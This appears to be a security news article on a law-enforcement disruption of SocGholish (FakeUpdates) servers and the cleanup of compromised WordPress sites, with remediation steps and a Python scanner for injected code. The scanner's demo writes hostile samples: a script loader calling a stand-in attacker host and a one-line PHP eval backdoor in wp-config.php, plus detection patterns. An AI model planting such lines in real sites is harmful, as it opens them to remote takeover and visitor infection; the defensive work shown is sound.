A coordinated law enforcement and private sector operation has disrupted the SocGholish malware distribution network, seizing 106 command-and-control (C&C) servers and domains used to orchestrate infections across the web. In the aftermath, security teams were able to clean approximately 15,000 compromised WordPress websites that had been serving as infection staging platforms for the botnet.
What Is SocGholish?
SocGholish, also known as FakeUpdates, is a JavaScript-based malware framework that has been active since at least 2017. It operates by injecting malicious JavaScript into compromised websites, typically WordPress installations, that shows visitors a fake browser update prompt. A user who accepts the "update" instead downloads a ZIP archive containing a JavaScript (.js) payload; opened on Windows, the script runs under the Windows Script Host, profiles the machine and gives the operators a foothold from which to fetch further payloads.
SocGholish has been widely used as an initial access vector, with its operators selling the resulting footholds to other criminal groups and delivering secondary malware including:
- NetSupport RAT for remote access
- Cobalt Strike beacons for enterprise network penetration
- Ransomware loaders, including for WastedLocker (operated by Evil Corp) and various RaaS affiliates
The framework is closely associated with Evil Corp (also tracked as Indrik Spider), a Russia-based cybercrime group sanctioned by the U.S. Treasury Department.
Operation Endgame
Operation Endgame is an ongoing international law enforcement effort targeting the infrastructure underpinning major malware distribution networks and initial access brokers. Previous phases of Operation Endgame in 2024 targeted IcedID, Smokeloader, SystemBC, and other malware families.
This latest action represents the first major SocGholish-specific disruption under the operation. Participating agencies and private partners executed coordinated sinkholing and seizure actions against 106 domains and server instances used by SocGholish operators to:
- Serve the malicious JavaScript injection code to compromised sites
- Host the fake browser update lures and ZIP payloads
- Manage victim telemetry and secondary payload delivery
WordPress Sites as Infection Intermediaries
SocGholish operators do not directly compromise victim machines from their own servers. Instead, they first compromise legitimate, high-traffic websites — predominantly WordPress sites — and inject their malicious JavaScript into those sites' pages. This technique allows the malware to be served from trusted, legitimate domains, bypassing many reputation-based security controls.
The 15,000 WordPress sites cleaned up as part of this action had been unknowingly serving SocGholish injection code to their visitors. Owners of these sites are being notified and assisted with remediation through web hosting providers and national CERTs.
Remediation for Website Owners
WordPress site administrators should take the following steps to verify whether their site was impacted:
- Scan all JavaScript and theme files for unexpected code injections, particularly code that creates <script> tags dynamically or contacts external domains; where WP-CLI is available, compare core and plugin files against their published checksums (wp core verify-checksums, wp plugin verify-checksums --all) to spot modified files
- Check wp-config.php, .htaccess, and any custom functions.php files for unauthorized modifications
- Review user accounts for unauthorized administrator additions
- Update all WordPress core, plugin, and theme components to the latest versions
- Change all administrative credentials and consider implementing two-factor authentication
- Review web server access logs (and file modification timestamps, where available) for the past 6–12 months for unexpected uploads, POST requests to unfamiliar PHP files, and files changed outside known deployment windows
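The first two checks in that list, as an added example written for this page (not the article's code and not any vendor tool): a Python scanner that walks a WordPress document root, flags dynamically created script tags, obfuscation helpers and eval-style PHP backdoors, and reports any <script src> host outside an allowlist. The indicator regexes and the ALLOWED_SCRIPT_HOSTS allowlist are this example's assumptions, not a signature for a specific SocGholish variant; the sample site tree it builds is constructed for the demo and uses hostnames under the reserved .test TLD.

```python
"""Scan a WordPress document root for injected JavaScript and PHP backdoors.

Added example, not code from the article or from any vendor tool. The
indicator patterns are generic assumptions about what injected code looks
like (dynamic <script> creation, obfuscation helpers, decode-then-eval PHP),
not a signature for any particular SocGholish variant.
"""
import re
import tempfile
from pathlib import Path

# Hosts from which the (hypothetical) site legitimately loads scripts.
ALLOWED_SCRIPT_HOSTS = {"example.com", "www.example.com", "ajax.googleapis.com"}

# Indicators checked in every scanned file. Each entry is (name, regex).
GENERIC_INDICATORS = [
    ("dynamic_script_tag", re.compile(r"createElement\(\s*['\"]script['\"]\s*\)", re.I)),
    ("charcode_obfuscation", re.compile(r"String\.fromCharCode\s*\(", re.I)),
    ("eval_call", re.compile(r"\beval\s*\(", re.I)),
    ("base64_decode_js", re.compile(r"\batob\s*\(", re.I)),
]

# PHP-only indicators: decode-then-eval chains and request-controlled execution.
PHP_INDICATORS = [
    ("php_eval_decoded", re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    ("php_exec_from_request", re.compile(
        r"\b(eval|assert|system|shell_exec|passthru)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)", re.I)),
]

# <script src="https://host/..."> or protocol-relative //host/...; captures the host.
SCRIPT_SRC = re.compile(r"<script[^>]+src\s*=\s*['\"](?:https?:)?//([^/'\"]+)", re.I)

SCANNED_SUFFIXES = {".php", ".js", ".html", ".htm"}


def scan_file(path):
    """Return [(indicator, line_no, excerpt)] for one file; empty if clean."""
    findings = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return findings
    checks = list(GENERIC_INDICATORS)
    if path.suffix == ".php" or path.name == ".htaccess":
        checks += PHP_INDICATORS
    for line_no, line in enumerate(text.splitlines(), 1):
        excerpt = line.strip()[:80]
        for name, rx in checks:
            if rx.search(line):
                findings.append((name, line_no, excerpt))
        for host in SCRIPT_SRC.findall(line):
            if host.lower() not in ALLOWED_SCRIPT_HOSTS:
                findings.append(("external_script_host:" + host.lower(), line_no, excerpt))
    return findings


def scan_wordpress(root):
    """Walk a WordPress root; return {relative_path: findings} for files with hits."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.suffix not in SCANNED_SUFFIXES and path.name != ".htaccess":
            continue
        hits = scan_file(path)
        if hits:
            report[path.relative_to(root).as_posix()] = hits
    return report


def build_sample_site(root):
    """Write a constructed, minimal WordPress-like tree: clean files plus files
    carrying the kinds of injection the remediation list says to look for.
    None of this is real SocGholish code; hostnames use the reserved .test TLD."""
    files = {
        ".htaccess": "RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n",
        "wp-content/themes/demo/footer.php":
            "<?php wp_footer(); ?>\n"
            '<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>\n',
        # Loader that builds a <script> element at runtime and points it off-site.
        "wp-content/themes/demo/header.php":
            "<?php wp_head(); ?>\n"
            "<script>var s=document.createElement('script');"
            "s.src='https://cdn.attacker-example.test/u.js';document.head.appendChild(s);</script>\n",
        # Obfuscated snippet appended to a core library file.
        "wp-includes/js/jquery/jquery.min.js":
            "/*! jQuery v3.7.1 */\n/* ...library body... */\neval(String.fromCharCode(118,97,114));\n",
        # Plugin that emits a script tag for a host outside the allowlist.
        "wp-content/plugins/seo-thing/seo.php":
            "<?php\n// adds tracking\necho '<script src=\"//stats.attacker-example.test/t.js\"></script>';\n",
        # Backdoor line inserted into wp-config.php.
        "wp-config.php":
            "<?php\ndefine('DB_NAME', 'wp');\n@eval(base64_decode($_POST['c']));\n",
    }
    for rel, body in files.items():
        p = Path(root) / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(body)


def demo():
    """Build the sample tree in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_site(tmp)
        return scan_wordpress(tmp)


if __name__ == "__main__":
    for rel, hits in demo().items():
        for name, line_no, excerpt in hits:
            print(f"{rel}:{line_no}: {name}: {excerpt}")
```

Point scan_wordpress at a real document root to get a candidate list; the sample run flags header.php, the appended jQuery line, the plugin's off-site script host and the wp-config.php backdoor while leaving footer.php and .htaccess clean. Regex hits are leads, not verdicts: confirm each against a pristine copy of the core, theme or plugin file, and expect real injections to be more heavily obfuscated than the sample, which is why the checksum comparison and the allowlist of script hosts matter more than any single pattern.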
Ongoing Threat
While this takedown represents a significant disruption, SocGholish infrastructure has historically been rebuilt within weeks following previous disruptions. Security researchers note that the underlying WordPress vulnerability exploitation campaigns that seed the initial site compromises will likely continue, and new C&C infrastructure may emerge.
Organizations using WordPress should ensure that a web application firewall and a malware scanner (such as Wordfence or Sucuri) are deployed, kept current, and configured for real-time monitoring.